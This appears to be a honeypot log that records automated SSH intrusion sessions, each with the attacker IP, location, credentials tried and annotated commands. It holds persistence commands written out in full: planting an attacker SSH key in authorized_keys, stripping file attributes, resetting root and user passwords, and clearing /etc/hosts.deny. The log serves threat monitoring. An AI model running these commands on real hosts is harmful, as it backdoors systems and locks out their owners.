$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "anything\nwlSbIQvSb8kS\nwlSbIQvSb8kS"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "anything\nwlSbIQvSb8kS\nwlSbIQvSb8kS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:0M3sGj0qFu5j"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "123123\n7Xblac0dJz7e\n7Xblac0dJz7e"|passwd|bash
$ echo "123123\n7Xblac0dJz7e\n7Xblac0dJz7e\n"|passwd
🎭 k-pop_root_5 (211.46.177.174) β€” Cheonan-si, South Korea Β· 3 sessions Β· 59 cmds
2026-05-13 19:07 EDT Β· as lol/lol, pakchoi/Kermit123@, root/s
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:kkcYFdvaUy0T"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "Kermit123@\nOMVCCMnWCuYK\nOMVCCMnWCuYK"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Kermit123@\nOMVCCMnWCuYK\nOMVCCMnWCuYK\n"|passwd
$ echo -e "lol\n1zAfq5XnZYQH\n1zAfq5XnZYQH"|passwd|bash
$ echo "lol\n1zAfq5XnZYQH\n1zAfq5XnZYQH\n"|passwd
🎭 hanbok_root_8 (112.219.151.50) β€” Yangsan, South Korea Β· 2 sessions Β· 40 cmds
2026-05-30 09:02 EDT Β· as dci/dci, mb/mb
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "dci\n3cNQhpPZWuLa\n3cNQhpPZWuLa"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "dci\n3cNQhpPZWuLa\n3cNQhpPZWuLa\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "mb\nL26d4s4iavM7\nL26d4s4iavM7"|passwd|bash
$ echo "mb\nL26d4s4iavM7\nL26d4s4iavM7\n"|passwd
🎭 ghost_root_61 (41.93.28.23) β€” Dar es Salaam, Tanzania Β· 1 session Β· 20 cmds
2026-05-30 08:59 EDT Β· as anything/anything
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "anything\nm4WMFmHrSxsk\nm4WMFmHrSxsk"|passwd|bash
$ Enter new UNIX password:
$ echo "anything\nm4WMFmHrSxsk\nm4WMFmHrSxsk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_8 (149.102.239.49) β€” Bucharest, Romania Β· 1 session Β· 20 cmds
2026-05-30 08:54 EDT Β· as mb/mb
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mb\ndiLwki9N6oNV\ndiLwki9N6oNV"|passwd|bash
$ Enter new UNIX password:
$ echo "mb\ndiLwki9N6oNV\ndiLwki9N6oNV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_6 (202.51.214.99) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-05-30 08:52 EDT Β· as dci/dci
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "dci\nchpLfSc4vmb6\nchpLfSc4vmb6"|passwd|bash
$ Enter new UNIX password:
$ echo "dci\nchpLfSc4vmb6\nchpLfSc4vmb6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_43 (103.82.21.8) β€” Dich Vong, Vietnam Β· 1 session Β· 19 cmds
2026-05-30 08:51 EDT Β· as root/s
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:GGx63ct0SbT8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_50 (89.39.246.58) β€” SfΓ’ntu Gheorghe, Romania Β· 2 sessions Β· 39 cmds
2026-05-30 07:39 EDT Β· as backuppc/backuppc, root/Password.123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "backuppc\nNAQY2G70nUb7\nNAQY2G70nUb7"|passwd|bash
$ Enter new UNIX password:
$ echo "backuppc\nNAQY2G70nUb7\nNAQY2G70nUb7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:r9I8khh5zMNg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 cipher_root_43 (165.154.229.58) β€” Ho Chi Minh City, Vietnam Β· 1 session Β· 20 cmds
2026-05-30 07:36 EDT Β· as backuppc/backuppc
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "backuppc\nFtImE4vJ5jFA\nFtImE4vJ5jFA"|passwd|bash
$ Enter new UNIX password:
$ echo "backuppc\nFtImE4vJ5jFA\nFtImE4vJ5jFA\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_50 (171.237.176.209) β€” Hanoi, Vietnam Β· 2 sessions Β· 39 cmds
2026-05-27 12:27 EDT Β· as raj/raj@123, root/mudar123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:9kEqlCx6zdrC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "raj@123\ni6cdeepQxl0k\ni6cdeepQxl0k"|passwd|bash
$ Enter new UNIX password:
$ echo "raj@123\ni6cdeepQxl0k\ni6cdeepQxl0k\n"|passwd
🎭 chateau_root_6 (173.249.52.138) β€” Lauterbourg, France Β· 2 sessions Β· 38 cmds
2026-05-24 03:54 EDT Β· as root/Qazwsx@123, root/mudar123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:OAJnW7Jq5i4t"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:hRwg1PK8mm7d"|chpasswd|bash
🎭 phantom_root_44 (79.116.7.251) β€” Alcobendas, Spain Β· 1 session Β· 19 cmds
2026-05-30 06:48 EDT Β· as root/mudar123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:T9U30jmduNTe"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_51 (103.115.48.229) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-30 05:33 EDT Β· as vpnuser/12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345\nklfEpvFS4KqI\nklfEpvFS4KqI"|passwd|bash
$ Enter new UNIX password:
$ echo "12345\nklfEpvFS4KqI\nklfEpvFS4KqI\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root (20.203.42.204) β€” Dubai, United Arab Emirates Β· 9 sessions Β· 179 cmds
2026-05-07 09:35 EDT Β· as es/12345, khan/khan, root/1998
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—9 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—9 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—9 // CPU profiling
$ echo "root:XnXiEI0AE8B9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—9 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—9
$ ls -lh $(which ls) Γ—9
$ which ls Γ—9
$ crontab -l Γ—9 // persistence setup
$ w Γ—9 // logged-in users check
$ uname -m Γ—9
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—9 // CPU profiling
$ top Γ—9 // process monitoring
$ uname Γ—9 // OS identification
$ uname -a Γ—9 // OS/kernel identification
$ whoami Γ—9 // privilege check
$ lscpu | grep Model Γ—9
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—9
$ echo -e "khan\nUjPy54H1Jpok\nUjPy54H1Jpok"|passwd|bash
